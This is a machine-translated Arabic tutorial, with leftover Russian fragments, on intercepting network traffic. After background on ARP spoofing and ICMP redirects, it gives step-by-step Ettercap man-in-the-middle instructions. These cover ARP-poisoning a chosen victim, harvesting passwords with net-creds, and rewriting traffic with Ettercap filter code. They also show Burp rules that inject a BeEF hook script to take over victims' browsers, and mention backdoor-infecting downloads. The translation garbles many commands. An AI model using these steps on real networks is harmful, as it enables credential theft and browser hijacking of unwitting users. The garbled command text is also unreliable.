بيت › التثبيت والتكوين › يستخدمه المتسللون لإعادة توجيه حركة المرور. طرق هجمات الهاكر. انتحال البيانات باستخدام Burp

يستخدمه المتسللون لإعادة توجيه حركة المرور. طرق هجمات الهاكر. انتحال البيانات باستخدام Burp

طرق اعتراض حركة مرور الشبكة

الاستماع إلى الشبكة باستخدام برامج محلل الشبكة هو الأول والأكثر أهمية بطريقة بسيطةاعتراض البيانات.

للحماية من التنصت على الشبكة، استخدم برامج خاصةعلى سبيل المثال، AntiSniff، القادرة على تحديد أجهزة الكمبيوتر الموجودة على الشبكة والتي تستمع إلى حركة مرور الشبكة.

لحل مشاكلها، تستخدم برامج مكافحة الشم علامة خاصة على وجود أجهزة استماع على الشبكة - يجب أن تكون بطاقة الشبكة الخاصة بجهاز الكمبيوتر المتشمم في وضع استماع خاص. أثناء وجودها في وضع الاستماع، تتفاعل أجهزة كمبيوتر الشبكة بطريقة خاصة مع مخططات بيانات IP المرسلة إلى المضيف الذي يتم اختباره. على سبيل المثال، يقوم المضيفون المستمعون عادةً بمعالجة كل حركة المرور الواردة، وليس فقط مخططات البيانات المرسلة إلى عنوان المضيف. هناك علامات أخرى تشير إلى سلوك مضيف مريب يمكن لـ AntiSniff التعرف عليه.

مما لا شك فيه أن التنصت مفيد جدًا من وجهة نظر المهاجم، لأنه يتيح لك الحصول على الكثير من المعلومات المفيدة - كلمات المرور المنقولة عبر الشبكة، وعناوين أجهزة الكمبيوتر المتصلة بالشبكة، والبيانات السرية، والرسائل، وما إلى ذلك. ومع ذلك، فإن التنصت البسيط لا يسمح للمتسلل بالتدخل في اتصالات الشبكة بين مضيفين من أجل تعديل البيانات وإتلافها. لحل مثل هذه المشكلة، هناك حاجة إلى تكنولوجيا أكثر تعقيدا.

أرز. 1 طلبات ARP كاذبة

دعونا نرى كيف يمكن للمتسلل استخدام ARP لاعتراض اتصالات الشبكة بين المضيفين A وB.

لاعتراض حركة مرور الشبكة بين المضيفين A وB، يفرض المتسلل عنوان IP الخاص به على هؤلاء المضيفين، بحيث يستخدم A وB عنوان IP المزيف هذا عند تبادل الرسائل. لفرض عنوان IP الخاص به، يقوم المتسلل بتنفيذ العمليات التالية.

يحدد المهاجم عناوين MAC للمضيفين A وB، على سبيل المثال، باستخدام الأمر nbtstat من حزمة W2RK.
يرسل المهاجم رسائل إلى عناوين MAC المحددة للمضيفين A وB، وهي عبارة عن استجابات ARP مزيفة لطلبات تحليل عناوين IP الخاصة بالمضيفين إلى عناوين MAC لأجهزة الكمبيوتر. يتم إبلاغ المضيف "أ" بأن عنوان IP الخاص بالمضيف "ب" يتوافق مع عنوان MAC الخاص بجهاز الكمبيوتر الخاص بالمهاجم؛ يتم إبلاغ المضيف B بأن عنوان IP الخاص بالمضيف A يتوافق أيضًا مع عنوان MAC الخاص بجهاز الكمبيوتر الخاص بالمهاجم.
يقوم المضيفان A وB بتخزين عناوين MAC المستلمة في ذاكرة التخزين المؤقت لـ ARP ثم استخدامها لإرسال الرسائل إلى بعضهما البعض. نظرًا لأن عنواني IP A وB يتوافقان مع عنوان MAC الخاص بجهاز الكمبيوتر الخاص بالمهاجم، فإن المضيفين A وB، دون أدنى شك، يتواصلان من خلال وسيط يمكنه فعل أي شيء برسائلهما.

للحماية من مثل هذه الهجمات، يجب على مسؤولي الشبكة الاحتفاظ بقاعدة بيانات تحتوي على جدول المراسلات بين عناوين MAC وعناوين IP لأجهزة الكمبيوتر الخاصة بالشبكة.

على شبكات UNIX، يمكن تنفيذ هذا النوع من هجوم طلب ARP المخادع باستخدام أدوات النظام المساعدة لمراقبة وإدارة حركة مرور الشبكة، على سبيل المثال، arpredirect. لسوء الحظ، لا يبدو أن هذه الأدوات المساعدة الموثوقة يتم تنفيذها على شبكات Windows. على سبيل المثال، على موقع NTsecurity، يمكنك تنزيل الأداة المساعدة GrabitAII، المقدمة كأداة لإعادة توجيه حركة المرور بين مضيفي الشبكة. ومع ذلك، فإن الفحص الأساسي لوظيفة الأداة المساعدة GrabitAII يُظهر أن النجاح الكامل في تنفيذ وظائفها لا يزال بعيدًا.

لاعتراض حركة مرور الشبكة، يمكن للمهاجم انتحال عنوان IP الحقيقي لجهاز توجيه الشبكة باستخدام عنوان IP الخاص به، والقيام بذلك، على سبيل المثال، باستخدام رسائل إعادة توجيه ICMP المزيفة. يجب على المضيف A، وفقًا لـ RFC-1122، أن ينظر إلى رسالة إعادة التوجيه المستلمة كرد فعل على مخطط بيانات مرسل إلى مضيف آخر، على سبيل المثال، B. يحدد المضيف A إجراءاته على رسالة إعادة التوجيه بناءً على محتويات رسالة إعادة التوجيه المستلمة، وإذا تم تحديد إعادة توجيه مخطط البيانات في إعادة التوجيه من A إلى B عبر مسار جديد، فهذا بالضبط ما سيفعله المضيف A.

أرز. 2 التوجيه الخاطئ

لإجراء توجيه خاطئ، يجب أن يعرف المهاجم بعض التفاصيل حول المؤسسة شبكه محليه، حيث يقع المضيف A، على وجه الخصوص، عنوان IP الخاص بجهاز التوجيه الذي يتم من خلاله إرسال حركة المرور من المضيف A إلى B. وبمعرفة ذلك، سيقوم المهاجم بإنشاء مخطط بيانات IP يتم فيه تعريف عنوان IP الخاص بالمرسل على أنه عنوان IP الخاص بجهاز التوجيه يتم تحديد المضيف A. ويتم تضمين المستلم أيضًا في مخطط البيانات رسالة إعادة توجيه ICMP مع تعيين حقل عنوان جهاز التوجيه الجديد على عنوان IP الخاص بجهاز الكمبيوتر الخاص بالمهاجم. بعد تلقي مثل هذه الرسالة، سيقوم المضيف A بإرسال كافة الرسائل إلى عنوان IP الخاص بجهاز الكمبيوتر الخاص بالمهاجم.

للحماية من مثل هذا الهجوم، يجب عليك تعطيل (على سبيل المثال، باستخدام جدار الحماية) معالجة رسائل إعادة توجيه ICMP على المضيف A، ويمكن لأمر Tracert (في Unix هو أمر Tracerout) الكشف عن عنوان IP لجهاز الكمبيوتر الخاص بالمهاجم . هذه الأدوات المساعدة قادرة على العثور على مسار إضافي ظهر على الشبكة المحلية ولم يتم توفيره أثناء التثبيت، ما لم يكن مسؤول الشبكة يقظًا بالطبع.

الأمثلة المذكورة أعلاه للاعتراضات (التي لا تكون قدرات المهاجمين محدودة عليها) تقنعنا بالحاجة إلى حماية البيانات المنقولة عبر الشبكة إذا كانت البيانات تحتوي على معلومات سرية. الطريقة الوحيدة للحماية من اعتراضات حركة مرور الشبكة هي استخدام البرامج التي تنفذ خوارزميات التشفير وبروتوكولات التشفير وتمنع الكشف عن المعلومات السرية واستبدالها. ولحل مثل هذه المشكلات، يوفر التشفير وسيلة لتشفير الرسائل المرسلة عبر بروتوكولات آمنة وتوقيعها والتحقق من صحتها.

يتم توفير التنفيذ العملي لجميع أساليب التشفير لحماية تبادل المعلومات من خلال شبكات VPN(الشبكة الخاصة الافتراضية – الشبكات الخاصة الافتراضية).

اعتراض اتصال TCP

ينبغي اعتبار هجوم اعتراض حركة مرور الشبكة الأكثر تطوراً بمثابة التقاط اتصال TCP (اختطاف TCP)، عندما يقوم المتسلل بمقاطعة جلسة الاتصال الحالية مع المضيف عن طريق إنشاء وإرسال حزم TCP إلى المضيف المهاجم. بعد ذلك، باستخدام قدرة بروتوكول TCP على استعادة اتصال TCP المنقطع، يعترض المتسلل جلسة الاتصال المتقطعة ويواصلها بدلاً من العميل المنقطع الاتصال.

يعد بروتوكول TCP (بروتوكول التحكم في الإرسال) أحد بروتوكولات النقل الأساسية. مستوى OSIمما يسمح لك بإنشاء اتصالات منطقية عبر قناة اتصال افتراضية. عبر هذه القناة، يتم إرسال واستقبال الحزم مع تسجيل تسلسلها، ويتم التحكم في تدفق الحزم، وتنظيم إعادة إرسال الحزم المشوهة، وفي نهاية الجلسة تنقطع قناة الاتصال. TCP هو البروتوكول الوحيد البروتوكول الأساسيمن عائلة TCP/IP، التي تحتوي على نظام متقدم لتحديد الرسائل والاتصال.

نظرة عامة على أدوات شم حزم البرامج

يمكن تقسيم جميع برامج المتشممين إلى فئتين: المتشممون الذين يدعمون الإطلاق من سطر الأوامر، والمتشممون بواجهة رسومية. ولكننا نلاحظ أن هناك متشممات تجمع بين هاتين الإمكانيتين. بالإضافة إلى ذلك، تختلف برامج التجسس عن بعضها البعض في البروتوكولات التي تدعمها، وعمق تحليل الحزم المعترضة، والقدرة على تكوين المرشحات، وإمكانية التوافق مع البرامج الأخرى.

عادة نافذة أي الشم واجهة رسوميةيتكون من ثلاث مناطق. يعرض الأول منهم البيانات الموجزة للحزم التي تم اعتراضها. عادةً ما تعرض هذه المنطقة الحد الأدنى من الحقول، وهي: وقت اعتراض الحزمة؛ عناوين IP الخاصة بمرسل الحزمة ومستلمها؛ عناوين MAC للمرسل والمستلم، وعناوين منفذ المصدر والوجهة؛ نوع البروتوكول (الشبكة أو النقل أو طبقة التطبيق)؛ بعض المعلومات الموجزة حول البيانات التي تم اعتراضها. تعرض المنطقة الثانية معلومات إحصائية حول الحزمة الفردية المحددة، وأخيرًا تعرض المنطقة الثالثة الحزمة في شكل حرف سداسي عشري أو ASCII.

تسمح لك جميع أدوات شم الحزم تقريبًا بتحليل الحزم التي تم فك تشفيرها (وهذا هو السبب في أن أدوات شم الحزم تسمى أيضًا محللي الحزم أو محللي البروتوكول). يقوم المتشمم بتوزيع الحزم التي تم اعتراضها عبر الطبقات والبروتوكولات. بعض متشممي الحزم قادرون على التعرف على البروتوكول وعرض المعلومات الملتقطة. عادةً ما يتم عرض هذا النوع من المعلومات في المنطقة الثانية من نافذة الشم. على سبيل المثال، يمكن لأي متشمم التعرف على بروتوكول TCP، ويمكن للمتشممين المتقدمين تحديد التطبيق الذي أنشأ حركة المرور هذه. يتعرف معظم محللي البروتوكولات على أكثر من 500 بروتوكول مختلف ويمكنهم وصفها وفك تشفيرها بالاسم. كلما زادت المعلومات التي يستطيع المتشمم فك تشفيرها وعرضها على الشاشة، قلّت الحاجة إلى فك التشفير يدويًا.

إحدى المشكلات التي قد يواجهها متسللو الحزم هي عدم القدرة على تعريف البروتوكول بشكل صحيح باستخدام منفذ آخر غير المنفذ الافتراضي. على سبيل المثال، لتحسين الأمان، قد يتم تكوين بعض التطبيقات المعروفة لاستخدام منافذ أخرى غير المنافذ الافتراضية. لذلك، بدلاً من المنفذ التقليدي 80 المخصص لخادم الويب، هذا الخادميمكنك إعادة تكوينه بالقوة إلى المنفذ 8088 أو أي منفذ آخر. بعض محللي الحزم في هذه الحالة غير قادرين على تحديد البروتوكول بشكل صحيح وعرض المعلومات فقط حول بروتوكول المستوى الأدنى (TCP أو UDP).

توجد برامج متشممة تأتي مع وحدات تحليلية برمجية كمكونات إضافية أو وحدات مدمجة تسمح لك بإنشاء تقارير تحتوي على معلومات تحليلية مفيدة حول حركة المرور التي تم اعتراضها.

ميزة أخرى مميزة لمعظم محللي حزم البرامج هي القدرة على تكوين عوامل التصفية قبل التقاط حركة المرور وبعدها. تحدد المرشحات حزمًا معينة من حركة المرور العامة وفقًا لمعيار معين، مما يسمح لك بالتخلص من المعلومات غير الضرورية عند تحليل حركة المرور.

بدائل لإتيركاب

Ettercap هو برنامج الهجوم الوسيط الأكثر شهرة، ولكن هل هو الأفضل؟ من خلال التعليمات بأكملها، سترى أن Ettercap لا يستخدم بمفرده أبدًا، وأن هذا البرنامج أو ذاك يتم تصميمه دائمًا معه في سلسلة معالجة حركة المرور. ولعل هذا يضيف مرونة؛ بشكل عام، هذا النهج هو أساس UNIX - برنامج واحد يؤدي مهمة واحدة، والمستخدم النهائي يجمع بين برامج مختلفة لتحقيق النتيجة المرجوة. مع هذا النهج، يكون رمز البرنامج أسهل في الحفاظ عليه، من هذه "الطوب" المصغرة، يمكنك بناء نظام من أي تعقيد ومرونة. ومع ذلك، فإن وجود خمس وحدات تحكم مفتوحة بمهام مختلفة، والتي يهدف عمل البرامج إلى تحقيق نتيجة واحدة، ليس مريحًا للغاية، إنه ببساطة أكثر تعقيدًا، وهناك إمكانية ارتكاب خطأ في مرحلة ما، ويتم تكوينه بالكامل سوف يعمل النظام عبثا.

شم صافي الاعتمادات:

عناوين URL التي تمت زيارتها
تم إرسال طلبات POST
تسجيلات الدخول/كلمات المرور من نماذج HTTP
تسجيلات الدخول/كلمات المرور لمصادقة HTTP الأساسية
عمليات بحث HTTP
تسجيلات الدخول/كلمات المرور لـ FTP
تسجيلات الدخول/كلمات المرور إلى IRC
تسجيلات الدخول/كلمات المرور عبر POP
تسجيلات الدخول/كلمات المرور عبر IMAP
تسجيلات الدخول/كلمات المرور Telnet
تسجيلات الدخول/كلمات المرور SMTP
سلسلة مجتمع SNMP
جميع بروتوكولات NTLMv1/v2 المدعومة مثل HTTP، وSMB، وLDAP، وما إلى ذلك.
كيربيروس

مجموعة جيدة من الصور التي تم اعتراضها، وشبكة الانجراف أبسط في هذا الصدد - فهي تعرض فقط الصور التي تم اعتراضها.

قم بتبديل جهازك إلى وضع إعادة التوجيه.

صدى "1" > /proc/sys/net/ipv4/ip_forward

قم بتشغيل Ettercap بواجهة رسومية (-G):

إيتيركاب-جي

الآن حدد المضيفين، هناك عنصر فرعي يبحث عن المضيفين. بعد اكتمال الفحص، حدد قائمة المضيفين:

كـ Target1، حدد جهاز التوجيه (إضافة إلى الهدف 1)، بينما حدد Target2 الجهاز الذي ستهاجمه (إضافة إلى الهدف 2).

ولكن هنا قد تنشأ العائق الأول، خاصة إذا كان هناك العديد من المضيفين. في تعليمات مختلفة، بما في ذلك الفيديو المعروض أعلاه، يتسلق المؤلفون إلى الجهاز المستهدف (كل شخص، لسبب ما، لديه Windows) ويستخدمون الأمر الذي ينظرون إليه على IP الخاص بهذا الجهاز على الشبكة المحلية. موافق، هذا الخيار غير مقبول للظروف الحقيقية.

إذا قمت بالمسح الضوئي باستخدام، يمكنك الحصول على بعض منها معلومات إضافيةحول المضيفين، بشكل أكثر دقة، حول الشركة المصنعة لبطاقة الشبكة:

نماب -sn 192.168.1.0/24

إذا كانت البيانات لا تزال غير كافية، فيمكنك إجراء فحص لتحديد نظام التشغيل:

نماب -O 192.168.1.0/24

كما نرى، تبين أن الجهاز الذي يحمل IP 192.168.1.33 هو Windows، إذا لم تكن هذه علامة من الأعلى، فما هي؟ 😉 هههه

وهذا ما نضيفه كهدف ثان.

انتقل الآن إلى عنصر القائمة Mitm. هناك، حدد تسمم ARP... حدد المربع بجوار اتصالات Sniff عن بعد.

نبدأ في الحصاد، في نافذة واحدة نطلق

صافي الاعتمادات

في برنامج آخر (يمكن تشغيل كلا البرنامجين بدون خيارات)

دريفت نت

بدأ جمع البيانات على الفور:

على الجانب الأيمن، فتحت شبكة Driftnet نافذة أخرى تعرض فيها الصور التي تم اعتراضها. في نافذة net-creds نرى المواقع التي تمت زيارتها وكلمات المرور المعترضة:

1.2 Ettercap + مجموعة التجشؤ
3. عرض البيانات (المواقع التي تمت زيارتها وكلمات المرور الملتقطة) في Ettercap

في القائمة "عرض"، لدينا إمكانية الوصول إلى علامتي التبويب "الاتصالات" و"الملفات الشخصية". يمكنك أيضًا تحديد مربع حل عناوين IP. الاتصالات هي بالطبع اتصالات. تقوم Ettercap بجمع ملفات التعريف في الذاكرة لكل مضيف تكتشفه. يتم جمع المستخدمين وكلمات المرور هناك. في هذه الحالة، يتم وضع علامة متقاطعة على الملفات الشخصية التي تحتوي على بيانات الحساب (كلمات المرور) التي تم التقاطها:

ليست هناك حاجة للاعتماد كثيرًا على الملفات الشخصية - على سبيل المثال، يتم وضع علامة على تسجيلات الدخول وكلمات المرور التي تم اعتراضها لـ FTP والخدمات الأخرى، حيث يمكن للبرنامج تفسير المعلومات المستلمة بوضوح على أنها بيانات اعتماد. ولا يشمل ذلك، على سبيل المثال، بيانات المصادقة الأساسية وتسجيلات الدخول وكلمات المرور المدخلة في نماذج الويب.

في Connections، يتم تمييز البيانات الواعدة بعلامة النجمة:

يمكنك النقر نقرًا مزدوجًا فوق هذه الإدخالات لعرض التفاصيل:

وحتى لا تقوم بالبحث عن هذه النجوم في جميع أنحاء القائمة، يمكنك الفرز حسب هذا الحقل وسوف تظهر جميعها في الأعلى أو الأسفل:

تم القبض على المصادقة الأساسية:

كلمة مرور تسجيل الدخول لـ Yandex (موضحة أدناه):

هذه هي بيانات الاعتماد التي تم اعتراضها لـ فكونتاكتي:

يتم أيضًا جمع البيانات الأكثر إثارة للاهتمام في وحدة التحكم السفلية:

إذا كنت تريد حفظ نتائج البرنامج، فاستخدم هذه الخيارات (حدد المفاتيح عند بدء تشغيل Ettercap:

خيارات التسجيل: -w، --write كتابة البيانات الملتقطة إلى pcapfile -L، --log كتابة كل حركة المرور إلى هذا -l، --log-info كتابة المعلومات السلبية فقط إلى هذا -m، --log-msg كتابة جميع الرسائل في -c, --compress استخدم ضغط gzip لملفات السجل

4. استبدال البيانات أثناء التنقل في Ettercap
4.1 استخدام مرشحات Ettercap المخصصة

ملحوظة: على الرغم من كل الاختبارات، إلا أن مرشحات Ettercap ما زالت لا تعمل معي. من الصعب أن نفهم ما إذا كان الأمر يتعلق بالأيدي، أو ميزات الأجهزة، أو خطأ في البرنامج نفسه... ولكن بالنسبة للإصدار 0.8.2 (الأحدث في الوقت الحالي)، يوجد تقرير خطأ حول مشكلات المرشحات. بشكل عام، إذا حكمنا من خلال تقارير الأخطاء والمنتديات، فإن المرشحات إما تتساقط كثيرًا أو لا تعمل على الإطلاق لفترة طويلة. يوجد فرع تم إجراء التغييرات عليه منذ 5 أشهر https://github.com/Ettercap/ettercap/tree/filter-improvements، أي. تحسينات التصفية (مع تحسينات التصفية). تم إجراء مجموعة متنوعة من الاختبارات لكل من هذا الفرع والإصدار من المستودع، وتم اختبار مرشحات مختلفة في ظل ظروف مختلفة، وتم إنفاق الكثير من الوقت، ولكن لم تكن هناك نتيجة. بالمناسبة، لتثبيت نسخة تحسينات المرشح في Kali Linux، عليك القيام بذلك:

Sudo apt-get إزالة ettercap-ettercap رسومية-common sudo apt-get install git debhelper bison check cmake flex Ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev libncurses5-dev libnet1-dev libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev Ghostscript Groff libtool libpcre3 libncurses5-dev git clone -b filter-improvements https://github.com/Ettercap/ettercap.git cd ettercap/ mkdir build cd build cmake ENABLE_PDF_DOCS =On ../ قم بإجراء التثبيت Sudo

بشكل عام، إذا لم تعمل المرشحات الخاصة بك، فأنت لست وحدك. في التعليمات الخاصة بـ Ettercap، لا يمكنني تخطي موضوع المرشحات، لذلك سيتم مناقشتها على أي حال.

حتى الآن كنا نستخدم Ettercap لتزييف ARP. هذا تطبيق سطحي للغاية. بفضل المرشحات المخصصة، يمكننا التدخل وتغيير حركة المرور بسرعة. يجب أن تكون المرشحات موجودة في ملفات منفصلة ويجب تجميعها باستخدام برنامج Etterfilter قبل الاستخدام. على الرغم من أن الوثائق التي تم توفير الرابط لها تبدو ضئيلة، إلا أنها مقترنة بالأمثلة الواردة أدناه، فإنها ستسمح لك بكتابة مرشحات مثيرة للاهتمام.

لنقم بإنشاء الفلتر الأول، والذي سيستبدل جميع الصور بما يلي:

في ملف اسمه نسخة img_replacer.filter:

إذا (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "Accept-Encoding")) ( استبدال("Accept-Encoding", "Accept-Rubbish!"); # ملاحظة: السلسلة البديلة هي نفس طول الرسالة الأصلية("zapped Accept-Encoding!\n"); ) ) if (ip.proto == TCP && tcp.src == 80) ( استبدال("src=" , " src=\"http://www.irongeek.com/images/jollypwn.png\" "); استبدال("SRC=", "src=\"http://www.irongeek.com/images/ jollypwn.png\" "); استبدال("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); استبدال("SRC =", "src= \" http://www.irongeek.com/images/jollypwn.png\" "); msg("Filter Ran.\n"); )

تجميع الملف:

Etterfilter img_replacer.filter -o img_replacer.ef

نتائج التجميع:

Etterfilter 0.8.2 حقوق الطبع والنشر 2001-2015 Ettercap Development Team 14 جدول بروتوكول تم تحميله: البيانات المفككة udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth 13 ثابتًا تم تحميلها: VRRP OSPF GRE UDP TCP ESP ICMP6 ICMP PPTP PPPOE IP6 IP ARP تحليل الملف المصدر تم الانتهاء من "img_replacer.filter". تم الكشف عن شجرة التعريف. تم تحويل التسميات إلى إزاحات حقيقية. تم كتابة الإخراج إلى "img_replacer.ef". -> البرنامج النصي مشفر في 18 تعليمات.

يخبر رمز التبديل -F البرنامج بتحميل عامل التصفية من الملف الذي يتبع رمز التبديل. بعد التجميع، اسم ملفنا الجديد مع الفلتر هو img_replacer.ef، لذلك يأخذ الأمر الشكل:

Ettercap -G -F img_replacer.ef

ملاحظة: عند مراقبة حركة مرور الويب، قد تكون الحزم التي تراها في شكل مشفر. ل عمل فعالالمرشحات، يحتاج Ettercap إلى حركة المرور في النموذج نص عادي. وفقًا لبعض الملاحظات، فإن نوع التشفير الذي تستخدمه صفحات الويب هو "Accept-Encoding: gzip, deflate"

يوجد أدناه مرشح يقوم بالكتابة فوق الترميز، مما يفرض الاتصال في شكل نص عادي:

إذا (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "gzip")) ( استبدال("gzip", " "); # ملاحظة: أربع مسافات في السلسلة المستبدلة msg ("Whited out gzip\n"); ) ) if (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "deflate")) ( استبدال("deflate", " "); # ملاحظة: سبع مسافات في السطر المستبدل msg("تم تبييضه\n"); ) )

تم وصف صيغة كتابة المرشحات بالتفصيل، وهناك بعض الأمثلة الإضافية:

# استبدال النص في الحزمة: if (ip.proto == TCP && search(DATA.data, "lol"))( استبدال("lol", "smh"); msg("filter ran"); ) # show رسالة، إذا كان منفذ TCP هو 22 if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( msg("SSH packet\n"); ) ) # write down حركة مرور telnet بأكملها، قم أيضًا بتنفيذ ./program لكل حزمة if (ip.proto == TCP) ( if (tcp.src == 23 || tcp.dst == 23) ( log(DATA.data, "./ logfile.log "); exec("./program"); )) ) # تسجيل كل حركة المرور باستثناء http if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) ( log (DATA.data , "./logfile.log"); ) # بعض العمليات على حمولة الحزمة if (DATA.data + 20 == 0x4142) ( DATA.data + 20 = 0x4243; ) else ( DATA.data = " modded"; DATA .data + 20 = 0x4445; ) # قم بإسقاط كافة الحزم التي تحتوي على "ettercap" if (search(DECODED.data, "ettercap")) ( msg("some one is talk about us...\n") ; drop( ); kill(); ) # سجل حزم ssh التي تم فك تشفيرها والتي تطابق التعبير العادي if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( if (regex(DECODED.data, ".*login.*")) ( log(DECODED.data, "./decrypted_log"); ) ) ) # قتل الحزم if (ip.ttl< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2 استبدال البيانات باستخدام التجشؤ

نقوم بتشغيل Ettercap وBurp كما هو موضح في الفقرة 1.2 أو في الفقرة 2.2.

في Burp، انتقل إلى الوكيل -> الخيارات. نجد المطابقة والاستبدال هناك. انقر فوق "إضافة" لإضافة قاعدة جديدة.

رأس الطلب هو رأس الطلب
هيئة الطلب - هيئة الطلب
رأس الاستجابة - رأس الاستجابة
هيئة الاستجابة - هيئة الاستجابة
طلب اسم المعلمة - طلب اسم المعلمة
طلب قيمة المعلمة - طلب قيمة المعلمة
طلب السطر الأول - السطر الأول من الطلب

إذا كنت بحاجة إلى تغيير البيانات المرسلة بواسطة طريقة GET، فهذا ينطبق على الرؤوس.

في ترميز HTML يوجد أيضًا شيء مثل الرأس (علامة الرأس). تلك المذكورة أعلاه ليس لها علاقة بهذا العنوان. أعلى قليلاً نتحدث عن رؤوس الحزم. إذا كنت ترغب في تغيير المحتوى صفحات HTML، فيجب عليك دائمًا تحديد نص الاستجابة بدلاً من رأس الطلب، حتى إذا كنت ستقوم بتغيير محتويات علامة الرأس (على سبيل المثال، العنوان).

إذا لم تكن على دراية التعبيرات العاديةإذن، من حيث المبدأ، لا يوجد ما يدعو للقلق: HTML يغفر كثيرًا، وما لا يفهمه، يتجاهل ببساطة - يمكنك استخدامه. إذا كنت تعرف كيفية استخدام التعبيرات العادية، فأنا أحترمك.)))

على سبيل المثال، لنقم بإنشاء قاعدة جديدة، وهي تغيير رأس الطلب إلى نص الاستجابة. في القاعدة نفسها سوف نتغير

بلا عنوان

حدد مربع مطابقة Regex.

الآن على جميع المواقع (بدون HTTPS) سيكون العنوان بلا عنوان:

أدخل سطرًا عشوائيًا بعد علامة الجسم (سيكون السطر الأول في النص). يتم تغيير رأس الطلب إلى نص الاستجابة. نحن نتغير

حدد مربع مطابقة Regex.

في الزاوية اليمنى العليا (اعتمادًا على التخطيط) يظهر النقش "أنا رائع!". يمكنك إدراج كود CSS وJavaScript وأي نص - أي شيء. يمكنك عمومًا إزالة كل شيء من الصفحة، ثم ملؤها بالمحتوى الخاص بك - كل هذا يتوقف على خيالك.

كانت الفكرة هي تعديل كل نموذج بشكل طفيف بحيث يتم إرسال البيانات إلى الخادم الأصلي وإلى خادم المهاجم (تنفيذ الإرسال المتعدد لكل نموذج). ولكن بعد أن استنتجنا أنه إذا لم تكن البيانات المرسلة مشفرة ولدينا إمكانية الوصول إليها، فإننا نراها بالفعل، ليست هناك حاجة لإرسالها إلى أي خادم. ومع ذلك، إذا كان شخص ما يحتاج إلى مثال عملي حقًا لإرسال البيانات من نموذج واحد إلى عدة خوادم في وقت واحد.

5. هوكوب على BeEF

للبدء في استخدام إمكانيات BeEF، نحتاج إلى تضمين ملف JavaScript في كود HTML، وعادةً ما يكون سطرًا مثل:

تختلف الطريقتان التاليتان فقط في طريقة تضمين هذه السلسلة.

5.1 ربط BeEF باستخدام مرشحات Ettercap

[القسم الذي سيتم إعداده لاحقا]

5.2 ربط لحم البقر مع التجشؤ

عليك أن تبدأ تمامًا كما هو مكتوب في الفقرة 4.2. فقط بدلاً من استبدال الرؤوس وإضافة نص إلى الموقع، سنقوم بتنفيذ كود JavaScript على شكل سطر:

في حالتي، هذا الملف متاح على IP 192.168.1.36 على المنفذ 3000. الملف يسمى Hook.js (يمكن تغييره في الإعدادات). أولئك. في حالتي أحتاج إلى حقن الخط:

يمكن القيام بذلك، على سبيل المثال، عن طريق إنشاء قاعدة جديدة، وتغيير رأس الطلب إلى نص الاستجابة. يجب أن يتم الاستبدال في كود HTML نفسه

رائع، عندما تفتح أي موقع ويب لا يحتوي على HTTPS، يتم إدراج كود JavaScript في كود HTML، مما يسمح لك بجمع المعلومات من خلال متصفح متصل وتنفيذ هجمات مختلفة:

6. العدوى بالأبواب الخلفية

يمكنك استبدال الملفات القابلة للتنفيذ وإصابتها باستخدام مرشحات Ettercap [التي لم تعد تعمل لسبب ما] واستخدام تطبيقات الطرف الثالث. على سبيل المثال، يمكن لـ BDFProxy القيام بذلك بسرعة. لسوء الحظ، لا يزال BDFProxy يعاني من تحديث Backdoor Factory في أبريل 2016: تمت إعادة تسمية حزمة libmproxy إلى mitmproxy في Python. بالنسبة لـ BDFProxy، تعد حزمة libmproxy تبعية ضرورية؛ بدون هذه الحزمة لن يبدأ البرنامج. لذلك، الآن، قبل "إصلاح" BDFProxy، من المستحيل استخدامه، لأنه حتى مع تثبيت Backdoor Factory، يشكو برنامج BDFProxy من غياب مكتبة libmproxy...

يمكن إجراء عملية مماثلة باستخدام Burp Suite. تم تقديم الخوارزمية خطوة بخطوة، وليس من المنطقي إعادة كتابتها مرة أخرى في هذا القسم.

7. استخدام ملحقات Ettercap

يمكن العثور على معلومات حول المكونات الإضافية لـ Ettercap. هناك الكثير من المكونات الإضافية، ويبدو لي أن تلك الموضحة أدناه هي الأكثر إثارة للاهتمام.

يمكن توصيل المكونات الإضافية عند تشغيل Ettercap، ويوجد خيار لذلك:

P، --plugin قم بتشغيل هذا

يمكن أيضًا تحميل المكونات الإضافية من واجهة المستخدم الرسومية:

[المادة قيد الإعداد]

7.1 arp_cop

يقوم بالإبلاغ عن نشاط ARP المشبوه من خلال المراقبة السلبية لطلبات/استجابات ARP. يمكنه الإبلاغ عن محاولات التسمم بـ ARP أو تعارضات IP البسيطة أو تغييرات IP. إذا كنت تقوم بإنشاء قائمة أولية للمضيفين، فسيعمل البرنامج الإضافي بشكل أكثر دقة.

Ettercap -TQP arp_cop //

مثال على الكشف الحقيقي عن انتحال ARP:
